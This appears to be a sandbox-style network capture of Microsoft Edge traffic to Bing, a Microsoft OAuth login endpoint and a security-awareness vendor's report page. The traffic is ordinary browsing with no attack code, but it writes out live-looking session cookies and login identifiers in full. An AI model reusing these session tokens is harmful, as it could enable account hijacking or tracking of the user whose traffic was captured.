cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 11239
x-check-cacheable: YES
cache-control: public, max-age=2005448
date: Thu, 29 Feb 2024 15:31:51 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220711.26a5988
-
GEThttps://th.bing.com/th?id=OSK.31bb8bd828eb9d00ed396b13dc134c00&w=153&h=118&o=6&pid=SANGAMmsedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OSK.31bb8bd828eb9d00ed396b13dc134c00&w=153&h=118&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2000
x-check-cacheable: YES
cache-control: public, max-age=2334203
date: Thu, 29 Feb 2024 15:31:51 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220711.26a5990
-
Remote address:8.8.8.8:53Request139.128.123.92.in-addr.arpaIN PTRResponse139.128.123.92.in-addr.arpaIN PTRa92-123-128-139deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request169.128.123.92.in-addr.arpaIN PTRResponse169.128.123.92.in-addr.arpaIN PTRa92-123-128-169deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestlogin.microsoftonline.comIN AResponselogin.microsoftonline.comIN CNAMElogin.mso.msidentity.comlogin.mso.msidentity.comIN CNAMEak.privatelink.msidentity.comak.privatelink.msidentity.comIN CNAMEwww.tm.ak.prd.aadg.akadns.netwww.tm.ak.prd.aadg.akadns.netIN A20.190.181.2www.tm.ak.prd.aadg.akadns.netIN A40.126.53.16www.tm.ak.prd.aadg.akadns.netIN A20.190.181.1www.tm.ak.prd.aadg.akadns.netIN A40.126.53.18www.tm.ak.prd.aadg.akadns.netIN A20.190.181.6www.tm.ak.prd.aadg.akadns.netIN A40.126.53.21www.tm.ak.prd.aadg.akadns.netIN A20.190.181.4www.tm.ak.prd.aadg.akadns.netIN A20.190.181.5
-
GEThttps://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=65b993d7-0600-4ced-b315-90c9b04c45c1&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%2292027AEB1C3C42769F3D4EA5938FBAC6%22%7dmsedge.exeRemote address:20.190.181.2:443RequestGET /common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=65b993d7-0600-4ced-b315-90c9b04c45c1&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%2292027AEB1C3C42769F3D4EA5938FBAC6%22%7d HTTP/2.0
host: login.microsoftonline.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
pragma: no-cache
content-type: text/html; charset=utf-8
content-encoding: gzip
expires: -1
vary: Accept-Encoding
strict-transport-security: max-age=31536000; includeSubDomains
x-content-type-options: nosniff
p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
x-ms-request-id: eca42da2-898a-4401-8d4d-955e3ce09700
x-ms-ests-server: 2.1.17396.8 - SEC ProdSlices
report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+SEC"}]}
nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
referrer-policy: strict-origin-when-cross-origin
x-xss-protection: 0
set-cookie: buid=0.AS8AMe_N-B6jSkuT5F9XHpElWnmtoZ62_ZpPi8MrcPluNMcBAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8k04-f_meFt6GlQvn7PmNldH625X15W6LPltK-IYEZAOg9O9Hx7env7i83HGPdLK5icwetJTW_xz_ifpi97A75hZjc76goAQViwMtDAnO5MogAA; expires=Sat, 30-Mar-2024 15:31:50 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: fpc=AjQ4gWaKnjxCpFd_ngGhNsqCeMQLAQAAAGWact0OAAAA; expires=Sat, 30-Mar-2024 15:31:50 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8YBKdq23lVDsARCeL8bTRKzSYbaB34i17gSyxFVETZN-UO4YJ5i2ehBm1O5IxWWmLDpF0BNKI4Ckg48ulpknjAy_neKjB_-NyTKxHVvTuB9ZKuWKipoKANDcwIaOfTeZ7DBblE4j3XtXwzugsLyffQU2-8_zL-39WzTs6J1ntrMUgAA; domain=.login.microsoftonline.com; path=/; secure; HttpOnly; SameSite=None
set-cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
set-cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly
date: Thu, 29 Feb 2024 15:31:50 GMT
content-length: 673
-
GEThttps://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=65b993d7-0600-4ced-b315-90c9b04c45c1&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%2292027AEB1C3C42769F3D4EA5938FBAC6%22%7dmsedge.exeRemote address:20.190.181.2:443RequestGET /common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=65b993d7-0600-4ced-b315-90c9b04c45c1&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%2292027AEB1C3C42769F3D4EA5938FBAC6%22%7d HTTP/2.0
host: login.microsoftonline.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: buid=0.AS8AMe_N-B6jSkuT5F9XHpElWnmtoZ62_ZpPi8MrcPluNMcBAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8k04-f_meFt6GlQvn7PmNldH625X15W6LPltK-IYEZAOg9O9Hx7env7i83HGPdLK5icwetJTW_xz_ifpi97A75hZjc76goAQViwMtDAnO5MogAA
cookie: fpc=AjQ4gWaKnjxCpFd_ngGhNsqCeMQLAQAAAGWact0OAAAA
cookie: esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8YBKdq23lVDsARCeL8bTRKzSYbaB34i17gSyxFVETZN-UO4YJ5i2ehBm1O5IxWWmLDpF0BNKI4Ckg48ulpknjAy_neKjB_-NyTKxHVvTuB9ZKuWKipoKANDcwIaOfTeZ7DBblE4j3XtXwzugsLyffQU2-8_zL-39WzTs6J1ntrMUgAA
cookie: x-ms-gateway-slice=estsfd
cookie: stsservicecookie=estsfd
ResponseHTTP/2.0 200
pragma: no-cache
content-type: text/html; charset=utf-8
content-encoding: gzip
expires: -1
vary: Accept-Encoding
strict-transport-security: max-age=31536000; includeSubDomains
x-content-type-options: nosniff
p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
x-ms-request-id: 943739b9-331e-4b8f-8f03-aa90b3189500
x-ms-ests-server: 2.1.17396.8 - FRC ProdSlices
report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+SEC"}]}
nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
referrer-policy: strict-origin-when-cross-origin
x-xss-protection: 0
set-cookie: buid=0.AS8AMe_N-B6jSkuT5F9XHpElWnmtoZ62_ZpPi8MrcPluNMcBAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8oEhCksme5khVxGiKHui6xwQ2_pNQFoRQHn6d4n1Qouvd-eXS3XYpNNMwnBMPodwx81BOilFMtOgk9bmiE7kR-fMiMPOYOAy8y-57MSzCNVUgAA; expires=Sat, 30-Mar-2024 15:32:32 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: fpc=AjQ4gWaKnjxCpFd_ngGhNsqCeMQLAgAAAGWact0OAAAA; expires=Sat, 30-Mar-2024 15:32:32 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
date: Thu, 29 Feb 2024 15:32:32 GMT
content-length: 673
-
Remote address:8.8.8.8:53Requestservices.bingapis.comIN AResponseservices.bingapis.comIN CNAMEservices-bingapis-com.e-0001.e-msedge.netservices-bingapis-com.e-0001.e-msedge.netIN CNAMEe-0001.e-msedge.nete-0001.e-msedge.netIN A13.107.5.80
-
Remote address:13.107.5.80:443RequestOPTIONS /suggestionchips/api/v1/cannedChips HTTP/2.0
host: services.bingapis.com
accept: */*
access-control-request-method: POST
access-control-request-headers: content-type
origin: https://www.bing.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 204
access-control-allow-headers: content-type
access-control-allow-methods: POST
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A92D63148B2449818FEEE0E15123089D Ref B: AMS04EDGE1512 Ref C: 2024-02-29T15:31:50Z
set-cookie: MUIDB=2D2424B7D02B6AA71DD23083D17C6B58; path=/; httponly; expires=Tue, 25-Mar-2025 15:31:50 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
-
Remote address:13.107.5.80:443RequestPOST /suggestionchips/api/v1/cannedChips HTTP/2.0
host: services.bingapis.com
content-length: 48
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: */*
origin: https://www.bing.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-length: 116
content-type: application/json; charset=utf-8
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 76CC799CC9D54FCD9CF7445CEF2F11BE Ref B: AMS04EDGE1512 Ref C: 2024-02-29T15:31:50Z
set-cookie: MUIDB=15170688A56562831D7912BCA4326343; path=/; httponly; expires=Tue, 25-Mar-2025 15:31:50 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
-
Remote address:8.8.8.8:53Request2.181.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request80.5.107.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request19.177.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request157.123.68.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request171.39.242.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request18.134.221.88.in-addr.arpaIN PTRResponse18.134.221.88.in-addr.arpaIN PTRa88-221-134-18deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestsosafe-awareness.comIN AResponsesosafe-awareness.comIN A162.159.135.42
-
GEThttps://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threatsmsedge.exeRemote address:162.159.135.42:443RequestGET /resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: document
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/html; charset=UTF-8
cf-ray: 85d1f5c20a197785-LHR
cf-cache-status: DYNAMIC
access-control-allow-origin: null
content-encoding: br
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept-Encoding
access-control-allow-headers: Content-Type, Authorization
access-control-allow-headers: Content-Type, X-CSRF-TOKEN
access-control-allow-methods: GET,PUT,POST,DELETE
content-security-policy: frame-ancestors 'self'; script-src 'unsafe-inline' 'unsafe-eval' blob: data: localhost localhost:3000 cdn.matomo.cloud sosafeawareness.matomo.cloud apis.google.com www.googletagmanager.com sosafe.local *.sosafe-awareness.com sosafe-awareness.com www.google-analytics.com snap.licdn.com bat.bing.com px.ads.linkedin.com adservice.google.com *.doubleclick.net *.gravatar.com boards-api.greenhouse.io boards.eu.greenhouse.io js.hsforms.net www.youtube.com www.youtube-nocookie.com play.google.com www.googleadservices.com static.hotjar.com script.hotjar.com js.hs-scripts.com js.hs-analytics.net js.hsadspixel.net js.hscollectedforms.net js.hs-banner.com js.hsleadflows.net js-na1.hs-scripts.com connect.facebook.net cdn.transifex.com widget.amazd.co widget-staging.amazd.co *.wistia.com *.wistia.net *.requestmetrics.com humanfirewallconference.kinsta.cloud humanfirewallconference.com human-firewall-conference.com *.podigee-cdn.net *.cookiebot.com cookiebot.com
cross-origin-embedder-policy: unsafe-none; report-to="default"
cross-origin-embedder-policy-report-only: require-corp; report-to="default"
cross-origin-opener-policy: same-origin; report-to="default"
cross-origin-opener-policy-report-only: same-origin; report-to="default"
cross-origin-resource-policy: cross-origin
feature-policy: payment 'self'; geolocation 'self'; microphone 'self' https://widget.amazd.co; camera 'self' https://widget.amazd.co; display-capture 'self' https://widget.amazd.co; fullscreen 'self' https://widget.amazd.co
ki-cache-type: None
ki-cf-cache-status: BYPASS
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
permissions-policy: payment=(self), geolocation=(self), microphone=(self "https://widget.amazd.co"), camera=(self "https://widget.amazd.co"), display-capture=(self "https://widget.amazd.co"), fullscreen=(self "https://widget.amazd.co"), accelerometer=(), gyroscope=(), magnetometer=()
referrer-policy: no-referrer-when-downgrade
strict-dynamic: https: 'self'; default-src 'self'
x-content-type-options: nosniff
x-edge-location-klb: 1
x-frame-options: DENY
x-kinsta-cache: MISS
x-permitted-cross-domain-policies: none
x-xss-protection: 1; mode=block
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AT%2FHKOGeePxTUh5I2S1GDY4PYQ40NRobdRBCx1fT18UDsUdrBjQskdc%2BbfJ83LnW70uj%2FM6gIJ9imnFRSySulR7BIHnCFoj8nRODgOPi9M%2F3xsHHEwF%2BgMIrrQ5ds6%2FWDxbWiZHj"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400
-
Remote address:162.159.135.42:443RequestGET /sosafe-files/themes/sosafe/css/style.css?ver=1.5.95 HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript; charset=UTF-8
cf-ray: 85d1f5c5beaa7785-LHR
cf-cache-status: HIT
access-control-allow-origin: *
age: 522040
cache-control: public, max-age=31536000, s-maxage=2592000
etag: W/"65d8ab46-15601"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Fri, 23 Feb 2024 14:27:18 GMT
vary: Accept-Encoding
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,9a91ac0ec05c4013aad6ce67338811eea37cffc2ceee0611fd61ff5bc3c05ea2
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=REBS0aFdpuRoRT3BHXneCiJvrp0eAmW4VaqWJaTR%2BKCAV18%2BUeiGRD9EUUszn0TozZeIiGeBryO8uPW6Z6JxqzpS4QU%2BIzjC%2FhNAdySpOKqu5fAujDn8rNI9W112dtf%2F7iSyNkXV"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
Remote address:162.159.135.42:443RequestGET /wp-includes/js/jquery/jquery.min.js?ver=1.5.95 HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css; charset=UTF-8
cf-ray: 85d1f5c5ceb47785-LHR
cf-cache-status: HIT
access-control-allow-origin: *
age: 861211
cache-control: public, max-age=31536000, s-maxage=2592000
etag: W/"65cb744b-705d"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Tue, 13 Feb 2024 13:53:15 GMT
vary: Accept-Encoding
cf-bgj: minify
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,1d98c49993ba9ab493cc36a0fb25aaf8eea5a9a0d7bf53309f2f1726b1d5758e
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pMJC31wWixqapST%2FAqRBxd7EFJzoz1ta9F%2FayLASslbIAInSWxWc65ST9wyyTOMjfcPEAzRIjRM4CwgDEyrjx1ADs2vAsG3yx0GMRCp75jnylttFT4m9OKqdH9wdWdiMVLblIcq0"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
Remote address:162.159.135.42:443RequestGET /sosafe-files/themes/sosafe/css/aos.css HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css; charset=UTF-8
cf-ray: 85d1f5c5bea87785-LHR
cf-cache-status: HIT
access-control-allow-origin: *
age: 522052
cache-control: public, max-age=31536000, s-maxage=2592000
etag: W/"65d8ab45-1f76a"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Fri, 23 Feb 2024 14:27:17 GMT
vary: Accept-Encoding
cf-bgj: minify
cf-polished: origSize=128874
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,4ca2a986c43b8ed258b256f0af12354f59d9e29a4d68f2a485810354e71bb70e
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KdPm4keecn0A%2FVRem%2FalUDIzXO1IexfNgUHMMGWOM5rqGtJx5Tdsegq2hRNCQJ8xQ0ZZpjHEWRuQTIyOy%2FMt1ffGnUu93JgaTDu6arCQ%2FGgntkjNRIQVlOkr9SQ1G3C%2BCLp1pK0U"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
